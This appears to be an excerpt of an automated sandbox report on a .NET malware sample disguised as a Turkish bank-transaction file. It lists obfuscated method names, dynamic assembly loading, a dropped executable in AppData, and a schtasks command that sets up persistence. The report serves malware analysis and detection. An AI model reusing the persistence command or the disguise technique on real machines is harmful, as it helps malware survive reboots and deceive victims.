Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	.Net Code: UrIOH5u7v9 System.Reflection.Assembly.Load(byte[])
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	.Net Code: UrIOH5u7v9 System.Reflection.Assembly.Load(byte[])

Source: Hesap_Hareketleri_10122024_html.exe

Static PE information: 0x85A342F2 [Thu Jan 17 21:00:34 2041 UTC]

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_070D3668 push edx; retf 5505h	1_2_070D3A4E
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_070D4117 push cs; retf	1_2_070D411A
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_07B3A6DF push 0000005Eh; iretd	1_2_07B3A6E6
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_01899C30 push esp; retf 0312h	16_2_01899D55
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E99243 push es; ret	16_2_06E99244
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E92DBE pushfd ; retf	16_2_06E92DC1

Source: Hesap_Hareketleri_10122024_html.exe	Static PE information: section name: .text entropy: 7.617057442893915
Source: UDYiGmDlq.exe.1.dr	Static PE information: section name: .text entropy: 7.617057442893915

Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, t3tNr5X3FaNQSpPq6A3.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cKffFuV12P', 'uJKfsAVtsx', 'KNLf9H245D', 'WJefvjrNv9', 'SMofN8jcrN', 'Kx1fijNxhs', 'aqXftB8SPx'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, IRUgVvJgNNqjcfMpI3.cs	High entropy of concatenated method names: 'DgZ67mF5nN', 'DMP6hnNlmo', 'BRm6Ht5CFX', 'hmE6cPUP4Q', 'wmK6WGkc10', 'm8c6ALoK2F', 'p8L6qY0WRM', 'OWg6xnG9N7', 'qL768RNaYU', 'Lko6mc00hJ'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, dgEuxN9BJYYIj8K8dC.cs	High entropy of concatenated method names: 'G7tGxyXqo6', 'EdXG8p4LDb', 'HdCGIyH0Sg', 'KQnGoEd2dW', 'HjDGlhDBGx', 'L4iGw0LfIV', 'dmAGYatQCV', 'hQfGppWjr1', 'wtSGKGEECM', 'mZfGF83A6Y'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	High entropy of concatenated method names: 'okYkrHZ0xm', 'YNHkgcI1AC', 'yi3k4S1THF', 'VBkkE1X2Ft', 'HwEkPFd4m0', 'xYwkeZbZRK', 'hAok6l7mir', 'Ytbk13ZcTJ', 'pjIk2N1o1J', 'HS0kUFbRd4'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, ObEbAlTSGUCLQf6I0g.cs	High entropy of concatenated method names: 'LpEfEiS2g2', 'PEEfPDVjX6', 'pxmfeQUV5L', 'p2Yf6RJ6lV', 'dWxfuQc6o7', 'NGYf1hI1Th', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, THIdySXO2D7YxqAYf65.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fUpBu2GPOn', 'LELBfZwQJp', 'WmYBVEGoCq', 'mIjBBLBNpa', 'uhfBnOiV7S', 'OuABRYBeib', 'CC5BSyOiM1'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, qgyUtcM0T7aVE4ngG6.cs	High entropy of concatenated method names: 'vygHndH1W', 'nM2cq7m5K', 'vx7ADNagr', 'iugq57xVp', 'aRs8shGEA', 'RQLmylsYs', 'qcXU6mDU5sADntbtPD', 'MB1a5un2a3TMldAteC', 'jFSDjlYGA', 'db3fWDmnt'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, xAZSO74EkGtarZLEhw.cs	High entropy of concatenated method names: 'Dispose', 'kOvXjq0V5B', 'yGQMoVHuUx', 'fJfQ9oRQZC', 'EILXTcCxeq', 'CurXzLoHdE', 'ProcessDialogKey', 'Y1VM3RhDjj', 'OglMXixF5D', 'sSXMMFbEbA'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, PTWSetCBhuxSY7OX81.cs	High entropy of concatenated method names: 'Vq65bPSnrn', 'XIq5TH4wsc', 'TdxD3mjDSv', 'PLUDXuZwV7', 'nfe5F0HemY', 'aFe5sHx7xk', 'L2s59CHVWE', 'PmA5v6YCEb', 'AQ95N2Nir1', 'egI5iu0M7C'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, rAhF7xmZuvCtAtX8Ea.cs	High entropy of concatenated method names: 'wNZPWG2X7M', 'RE1PqjGR5R', 'zq3EyKffjO', 'TDoElpeSpv', 'nHSEw0eqcH', 'WKdE0t0F3U', 'wOSEYPjcQP', 'Gb0Ep1Rv8l', 'TioEJB4Q9Y', 'aSYEKBPVIP'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, jlyNOAvXee9TPCiBok.cs	High entropy of concatenated method names: 'SJEaKPk2Kc', 'OZmasX99Oy', 'b1iavaI7fQ', 'fL5aNZLPkm', 'QmXao4LIvX', 'hPhayvOg1X', 'oa1alBpuxp', 'MxJawMsZsG', 'BGVa0uYwx3', 'jAtaYNvBTg'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, boproK8gK8Svel7aOx.cs	High entropy of concatenated method names: 'y3OEc0eBln', 'Yi8EAEB1Lp', 'OGhExSIcFn', 'zr7E8EMb4c', 'tJ8EaEMdxL', 'QKsELFSAPA', 'OjIE58uNxl', 'VYgEDyxTwg', 'EdGEux2nF9', 'c4FEfrqgdp'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, BMDQsytqtEvG1mYZfc.cs	High entropy of concatenated method names: 'e565UC2j1c', 'GsW5ZHfywR', 'ToString', 'sQb5gVySQq', 'm5j54gfbc0', 'Fod5E6U4R2', 'bKO5PE7clu', 'QRD5etsbUT', 'flp56BaR4a', 'geB51QX722'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, HyLp64OqVmfwWTJe07.cs	High entropy of concatenated method names: 'MFwX69lmFd', 'tpVX1xkgbW', 'NgKXU8Svel', 'xaOXZxDAhF', 'TX8XaEaQC6', 'cWNXLsf6JW', 'CyVM1GU3KhnMSbi3aq', 'MAlIqSLVnoOS6i6dNy', 'To3XXXa8Tx', 'dlVXkwHUEe'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, DlwXVmdWq1Ovq0V5Bx.cs	High entropy of concatenated method names: 'wh4uaygidv', 'FHju5BqtQR', 'aA7uuPTJae', 'KInuVA3k1W', 'R7cunp7YvA', 'SRJuSeTdXi', 'Dispose', 'cARDg0uT4e', 'TifD4364my', 'kxrDEbmkLb'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, aCgfPKEqQovJjtBgRs.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'r98Mj8NfPu', 'wStMTHsA3r', 'U2SMzcDJYU', 'DRPk33LCIc', 'bJFkXVWYOW', 'vrWkMoJbUv', 'SJLkkMTKNO', 'cf9dOsiukT4k9tkJyTP'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, ABelVyYLm62FT3haQZ.cs	High entropy of concatenated method names: 'fGc6gE9fWR', 'C9y6ECYiWR', 'VSJ6eutjHh', 'h4EeTAJyBe', 'Erlez7rH35', 'e6863a1iwE', 'WoI6XnJgXP', 'KVa6M4C5Bi', 'Q7i6kFOuhL', 'cnh6OB83iK'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, J9lmFdxVpVxkgbW2mF.cs	High entropy of concatenated method names: 'q0O4vMj3Cm', 'Jen4NL7me5', 'fEt4iWjUI9', 'Nbh4tP0IoO', 'LnA4Q8Cecu', 'uFF4COcrFj', 'CgI4dcUbpj', 'zJV4bWsuLM', 'pGt4jHO1BG', 'fCQ4T0tTly'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, UC6MWNIsf6JWUhlm5E.cs	High entropy of concatenated method names: 'fseerYBkq7', 'Qfte42myej', 'XsxePNFjIO', 'LqTe6i0sEx', 'dChe1lbIfh', 'hhKPQQt13C', 'p1RPCTSLud', 'a2MPdS6ino', 'F8sPbwVN4g', 'mynPjBggoQ'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, LFYk5qz2R4anqQbU7M.cs	High entropy of concatenated method names: 'KmJfAnuFF5', 'W27fxVUWDm', 'q8af8Xj5uc', 'jZjfIv1ieD', 'yuVfoTkHnK', 'mcJflEBUOl', 'UPefwhv34Y', 'Wf0fSf6272', 'tSVf74A5b8', 'DTwfhTijkU'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, zbwTAnXX7sdkGMcdWZ0.cs	High entropy of concatenated method names: 'ErsfTP7GNq', 'MgrfzqmQ04', 'woKV3mImYN', 'vWBVXn25O6', 'QSvVM612Bq', 'G4oVkgW14O', 'O5DVO65yZW', 'APRVra93R2', 'oHkVgxNYHX', 'uUaV4OGuIA'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, v1MNmCihCuOqcm6qqa.cs	High entropy of concatenated method names: 'ToString', 'MPALFE8qkK', 'WJ4LogqNkn', 'aJvLycgqta', 'tElLlWImc6', 'Qt8LwPoBxf', 'JuDL0BokIF', 'fssLYVF4uf', 'qU4Lpf41CN', 'KYnLJ5t5IM'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, tRhDjjjKglixF5DuSX.cs	High entropy of concatenated method names: 'gVruIUuxqy', 'fCHuoYq97Q', 'yq8uyDTdcf', 'uAbulcGbpf', 'BqUuw4AFGk', 'Vbgu0rTFsM', 'N5muYeqIbg', 'TZSup4feRS', 'mUJuJlMypA', 'xHbuKppj3Y'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, t3tNr5X3FaNQSpPq6A3.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cKffFuV12P', 'uJKfsAVtsx', 'KNLf9H245D', 'WJefvjrNv9', 'SMofN8jcrN', 'Kx1fijNxhs', 'aqXftB8SPx'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, IRUgVvJgNNqjcfMpI3.cs	High entropy of concatenated method names: 'DgZ67mF5nN', 'DMP6hnNlmo', 'BRm6Ht5CFX', 'hmE6cPUP4Q', 'wmK6WGkc10', 'm8c6ALoK2F', 'p8L6qY0WRM', 'OWg6xnG9N7', 'qL768RNaYU', 'Lko6mc00hJ'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, dgEuxN9BJYYIj8K8dC.cs	High entropy of concatenated method names: 'G7tGxyXqo6', 'EdXG8p4LDb', 'HdCGIyH0Sg', 'KQnGoEd2dW', 'HjDGlhDBGx', 'L4iGw0LfIV', 'dmAGYatQCV', 'hQfGppWjr1', 'wtSGKGEECM', 'mZfGF83A6Y'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	High entropy of concatenated method names: 'okYkrHZ0xm', 'YNHkgcI1AC', 'yi3k4S1THF', 'VBkkE1X2Ft', 'HwEkPFd4m0', 'xYwkeZbZRK', 'hAok6l7mir', 'Ytbk13ZcTJ', 'pjIk2N1o1J', 'HS0kUFbRd4'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, ObEbAlTSGUCLQf6I0g.cs	High entropy of concatenated method names: 'LpEfEiS2g2', 'PEEfPDVjX6', 'pxmfeQUV5L', 'p2Yf6RJ6lV', 'dWxfuQc6o7', 'NGYf1hI1Th', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, THIdySXO2D7YxqAYf65.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fUpBu2GPOn', 'LELBfZwQJp', 'WmYBVEGoCq', 'mIjBBLBNpa', 'uhfBnOiV7S', 'OuABRYBeib', 'CC5BSyOiM1'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, qgyUtcM0T7aVE4ngG6.cs	High entropy of concatenated method names: 'vygHndH1W', 'nM2cq7m5K', 'vx7ADNagr', 'iugq57xVp', 'aRs8shGEA', 'RQLmylsYs', 'qcXU6mDU5sADntbtPD', 'MB1a5un2a3TMldAteC', 'jFSDjlYGA', 'db3fWDmnt'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, xAZSO74EkGtarZLEhw.cs	High entropy of concatenated method names: 'Dispose', 'kOvXjq0V5B', 'yGQMoVHuUx', 'fJfQ9oRQZC', 'EILXTcCxeq', 'CurXzLoHdE', 'ProcessDialogKey', 'Y1VM3RhDjj', 'OglMXixF5D', 'sSXMMFbEbA'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, PTWSetCBhuxSY7OX81.cs	High entropy of concatenated method names: 'Vq65bPSnrn', 'XIq5TH4wsc', 'TdxD3mjDSv', 'PLUDXuZwV7', 'nfe5F0HemY', 'aFe5sHx7xk', 'L2s59CHVWE', 'PmA5v6YCEb', 'AQ95N2Nir1', 'egI5iu0M7C'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, rAhF7xmZuvCtAtX8Ea.cs	High entropy of concatenated method names: 'wNZPWG2X7M', 'RE1PqjGR5R', 'zq3EyKffjO', 'TDoElpeSpv', 'nHSEw0eqcH', 'WKdE0t0F3U', 'wOSEYPjcQP', 'Gb0Ep1Rv8l', 'TioEJB4Q9Y', 'aSYEKBPVIP'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, jlyNOAvXee9TPCiBok.cs	High entropy of concatenated method names: 'SJEaKPk2Kc', 'OZmasX99Oy', 'b1iavaI7fQ', 'fL5aNZLPkm', 'QmXao4LIvX', 'hPhayvOg1X', 'oa1alBpuxp', 'MxJawMsZsG', 'BGVa0uYwx3', 'jAtaYNvBTg'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, boproK8gK8Svel7aOx.cs	High entropy of concatenated method names: 'y3OEc0eBln', 'Yi8EAEB1Lp', 'OGhExSIcFn', 'zr7E8EMb4c', 'tJ8EaEMdxL', 'QKsELFSAPA', 'OjIE58uNxl', 'VYgEDyxTwg', 'EdGEux2nF9', 'c4FEfrqgdp'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, BMDQsytqtEvG1mYZfc.cs	High entropy of concatenated method names: 'e565UC2j1c', 'GsW5ZHfywR', 'ToString', 'sQb5gVySQq', 'm5j54gfbc0', 'Fod5E6U4R2', 'bKO5PE7clu', 'QRD5etsbUT', 'flp56BaR4a', 'geB51QX722'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, HyLp64OqVmfwWTJe07.cs	High entropy of concatenated method names: 'MFwX69lmFd', 'tpVX1xkgbW', 'NgKXU8Svel', 'xaOXZxDAhF', 'TX8XaEaQC6', 'cWNXLsf6JW', 'CyVM1GU3KhnMSbi3aq', 'MAlIqSLVnoOS6i6dNy', 'To3XXXa8Tx', 'dlVXkwHUEe'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, DlwXVmdWq1Ovq0V5Bx.cs	High entropy of concatenated method names: 'wh4uaygidv', 'FHju5BqtQR', 'aA7uuPTJae', 'KInuVA3k1W', 'R7cunp7YvA', 'SRJuSeTdXi', 'Dispose', 'cARDg0uT4e', 'TifD4364my', 'kxrDEbmkLb'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, aCgfPKEqQovJjtBgRs.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'r98Mj8NfPu', 'wStMTHsA3r', 'U2SMzcDJYU', 'DRPk33LCIc', 'bJFkXVWYOW', 'vrWkMoJbUv', 'SJLkkMTKNO', 'cf9dOsiukT4k9tkJyTP'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, ABelVyYLm62FT3haQZ.cs	High entropy of concatenated method names: 'fGc6gE9fWR', 'C9y6ECYiWR', 'VSJ6eutjHh', 'h4EeTAJyBe', 'Erlez7rH35', 'e6863a1iwE', 'WoI6XnJgXP', 'KVa6M4C5Bi', 'Q7i6kFOuhL', 'cnh6OB83iK'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, J9lmFdxVpVxkgbW2mF.cs	High entropy of concatenated method names: 'q0O4vMj3Cm', 'Jen4NL7me5', 'fEt4iWjUI9', 'Nbh4tP0IoO', 'LnA4Q8Cecu', 'uFF4COcrFj', 'CgI4dcUbpj', 'zJV4bWsuLM', 'pGt4jHO1BG', 'fCQ4T0tTly'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, UC6MWNIsf6JWUhlm5E.cs	High entropy of concatenated method names: 'fseerYBkq7', 'Qfte42myej', 'XsxePNFjIO', 'LqTe6i0sEx', 'dChe1lbIfh', 'hhKPQQt13C', 'p1RPCTSLud', 'a2MPdS6ino', 'F8sPbwVN4g', 'mynPjBggoQ'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, LFYk5qz2R4anqQbU7M.cs	High entropy of concatenated method names: 'KmJfAnuFF5', 'W27fxVUWDm', 'q8af8Xj5uc', 'jZjfIv1ieD', 'yuVfoTkHnK', 'mcJflEBUOl', 'UPefwhv34Y', 'Wf0fSf6272', 'tSVf74A5b8', 'DTwfhTijkU'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, zbwTAnXX7sdkGMcdWZ0.cs	High entropy of concatenated method names: 'ErsfTP7GNq', 'MgrfzqmQ04', 'woKV3mImYN', 'vWBVXn25O6', 'QSvVM612Bq', 'G4oVkgW14O', 'O5DVO65yZW', 'APRVra93R2', 'oHkVgxNYHX', 'uUaV4OGuIA'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, v1MNmCihCuOqcm6qqa.cs	High entropy of concatenated method names: 'ToString', 'MPALFE8qkK', 'WJ4LogqNkn', 'aJvLycgqta', 'tElLlWImc6', 'Qt8LwPoBxf', 'JuDL0BokIF', 'fssLYVF4uf', 'qU4Lpf41CN', 'KYnLJ5t5IM'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, tRhDjjjKglixF5DuSX.cs	High entropy of concatenated method names: 'gVruIUuxqy', 'fCHuoYq97Q', 'yq8uyDTdcf', 'uAbulcGbpf', 'BqUuw4AFGk', 'Vbgu0rTFsM', 'N5muYeqIbg', 'TZSup4feRS', 'mUJuJlMypA', 'xHbuKppj3Y'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, t3tNr5X3FaNQSpPq6A3.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cKffFuV12P', 'uJKfsAVtsx', 'KNLf9H245D', 'WJefvjrNv9', 'SMofN8jcrN', 'Kx1fijNxhs', 'aqXftB8SPx'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, IRUgVvJgNNqjcfMpI3.cs	High entropy of concatenated method names: 'DgZ67mF5nN', 'DMP6hnNlmo', 'BRm6Ht5CFX', 'hmE6cPUP4Q', 'wmK6WGkc10', 'm8c6ALoK2F', 'p8L6qY0WRM', 'OWg6xnG9N7', 'qL768RNaYU', 'Lko6mc00hJ'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, dgEuxN9BJYYIj8K8dC.cs	High entropy of concatenated method names: 'G7tGxyXqo6', 'EdXG8p4LDb', 'HdCGIyH0Sg', 'KQnGoEd2dW', 'HjDGlhDBGx', 'L4iGw0LfIV', 'dmAGYatQCV', 'hQfGppWjr1', 'wtSGKGEECM', 'mZfGF83A6Y'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	High entropy of concatenated method names: 'okYkrHZ0xm', 'YNHkgcI1AC', 'yi3k4S1THF', 'VBkkE1X2Ft', 'HwEkPFd4m0', 'xYwkeZbZRK', 'hAok6l7mir', 'Ytbk13ZcTJ', 'pjIk2N1o1J', 'HS0kUFbRd4'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, ObEbAlTSGUCLQf6I0g.cs	High entropy of concatenated method names: 'LpEfEiS2g2', 'PEEfPDVjX6', 'pxmfeQUV5L', 'p2Yf6RJ6lV', 'dWxfuQc6o7', 'NGYf1hI1Th', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, THIdySXO2D7YxqAYf65.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fUpBu2GPOn', 'LELBfZwQJp', 'WmYBVEGoCq', 'mIjBBLBNpa', 'uhfBnOiV7S', 'OuABRYBeib', 'CC5BSyOiM1'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, qgyUtcM0T7aVE4ngG6.cs	High entropy of concatenated method names: 'vygHndH1W', 'nM2cq7m5K', 'vx7ADNagr', 'iugq57xVp', 'aRs8shGEA', 'RQLmylsYs', 'qcXU6mDU5sADntbtPD', 'MB1a5un2a3TMldAteC', 'jFSDjlYGA', 'db3fWDmnt'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, xAZSO74EkGtarZLEhw.cs	High entropy of concatenated method names: 'Dispose', 'kOvXjq0V5B', 'yGQMoVHuUx', 'fJfQ9oRQZC', 'EILXTcCxeq', 'CurXzLoHdE', 'ProcessDialogKey', 'Y1VM3RhDjj', 'OglMXixF5D', 'sSXMMFbEbA'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, PTWSetCBhuxSY7OX81.cs	High entropy of concatenated method names: 'Vq65bPSnrn', 'XIq5TH4wsc', 'TdxD3mjDSv', 'PLUDXuZwV7', 'nfe5F0HemY', 'aFe5sHx7xk', 'L2s59CHVWE', 'PmA5v6YCEb', 'AQ95N2Nir1', 'egI5iu0M7C'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, rAhF7xmZuvCtAtX8Ea.cs	High entropy of concatenated method names: 'wNZPWG2X7M', 'RE1PqjGR5R', 'zq3EyKffjO', 'TDoElpeSpv', 'nHSEw0eqcH', 'WKdE0t0F3U', 'wOSEYPjcQP', 'Gb0Ep1Rv8l', 'TioEJB4Q9Y', 'aSYEKBPVIP'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, jlyNOAvXee9TPCiBok.cs	High entropy of concatenated method names: 'SJEaKPk2Kc', 'OZmasX99Oy', 'b1iavaI7fQ', 'fL5aNZLPkm', 'QmXao4LIvX', 'hPhayvOg1X', 'oa1alBpuxp', 'MxJawMsZsG', 'BGVa0uYwx3', 'jAtaYNvBTg'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, boproK8gK8Svel7aOx.cs	High entropy of concatenated method names: 'y3OEc0eBln', 'Yi8EAEB1Lp', 'OGhExSIcFn', 'zr7E8EMb4c', 'tJ8EaEMdxL', 'QKsELFSAPA', 'OjIE58uNxl', 'VYgEDyxTwg', 'EdGEux2nF9', 'c4FEfrqgdp'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, BMDQsytqtEvG1mYZfc.cs	High entropy of concatenated method names: 'e565UC2j1c', 'GsW5ZHfywR', 'ToString', 'sQb5gVySQq', 'm5j54gfbc0', 'Fod5E6U4R2', 'bKO5PE7clu', 'QRD5etsbUT', 'flp56BaR4a', 'geB51QX722'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, HyLp64OqVmfwWTJe07.cs	High entropy of concatenated method names: 'MFwX69lmFd', 'tpVX1xkgbW', 'NgKXU8Svel', 'xaOXZxDAhF', 'TX8XaEaQC6', 'cWNXLsf6JW', 'CyVM1GU3KhnMSbi3aq', 'MAlIqSLVnoOS6i6dNy', 'To3XXXa8Tx', 'dlVXkwHUEe'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, DlwXVmdWq1Ovq0V5Bx.cs	High entropy of concatenated method names: 'wh4uaygidv', 'FHju5BqtQR', 'aA7uuPTJae', 'KInuVA3k1W', 'R7cunp7YvA', 'SRJuSeTdXi', 'Dispose', 'cARDg0uT4e', 'TifD4364my', 'kxrDEbmkLb'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, aCgfPKEqQovJjtBgRs.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'r98Mj8NfPu', 'wStMTHsA3r', 'U2SMzcDJYU', 'DRPk33LCIc', 'bJFkXVWYOW', 'vrWkMoJbUv', 'SJLkkMTKNO', 'cf9dOsiukT4k9tkJyTP'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, ABelVyYLm62FT3haQZ.cs	High entropy of concatenated method names: 'fGc6gE9fWR', 'C9y6ECYiWR', 'VSJ6eutjHh', 'h4EeTAJyBe', 'Erlez7rH35', 'e6863a1iwE', 'WoI6XnJgXP', 'KVa6M4C5Bi', 'Q7i6kFOuhL', 'cnh6OB83iK'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, J9lmFdxVpVxkgbW2mF.cs	High entropy of concatenated method names: 'q0O4vMj3Cm', 'Jen4NL7me5', 'fEt4iWjUI9', 'Nbh4tP0IoO', 'LnA4Q8Cecu', 'uFF4COcrFj', 'CgI4dcUbpj', 'zJV4bWsuLM', 'pGt4jHO1BG', 'fCQ4T0tTly'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, UC6MWNIsf6JWUhlm5E.cs	High entropy of concatenated method names: 'fseerYBkq7', 'Qfte42myej', 'XsxePNFjIO', 'LqTe6i0sEx', 'dChe1lbIfh', 'hhKPQQt13C', 'p1RPCTSLud', 'a2MPdS6ino', 'F8sPbwVN4g', 'mynPjBggoQ'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, LFYk5qz2R4anqQbU7M.cs	High entropy of concatenated method names: 'KmJfAnuFF5', 'W27fxVUWDm', 'q8af8Xj5uc', 'jZjfIv1ieD', 'yuVfoTkHnK', 'mcJflEBUOl', 'UPefwhv34Y', 'Wf0fSf6272', 'tSVf74A5b8', 'DTwfhTijkU'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, zbwTAnXX7sdkGMcdWZ0.cs	High entropy of concatenated method names: 'ErsfTP7GNq', 'MgrfzqmQ04', 'woKV3mImYN', 'vWBVXn25O6', 'QSvVM612Bq', 'G4oVkgW14O', 'O5DVO65yZW', 'APRVra93R2', 'oHkVgxNYHX', 'uUaV4OGuIA'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, v1MNmCihCuOqcm6qqa.cs	High entropy of concatenated method names: 'ToString', 'MPALFE8qkK', 'WJ4LogqNkn', 'aJvLycgqta', 'tElLlWImc6', 'Qt8LwPoBxf', 'JuDL0BokIF', 'fssLYVF4uf', 'qU4Lpf41CN', 'KYnLJ5t5IM'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, tRhDjjjKglixF5DuSX.cs	High entropy of concatenated method names: 'gVruIUuxqy', 'fCHuoYq97Q', 'yq8uyDTdcf', 'uAbulcGbpf', 'BqUuw4AFGk', 'Vbgu0rTFsM', 'N5muYeqIbg', 'TZSup4feRS', 'mUJuJlMypA', 'xHbuKppj3Y'

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

File created: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

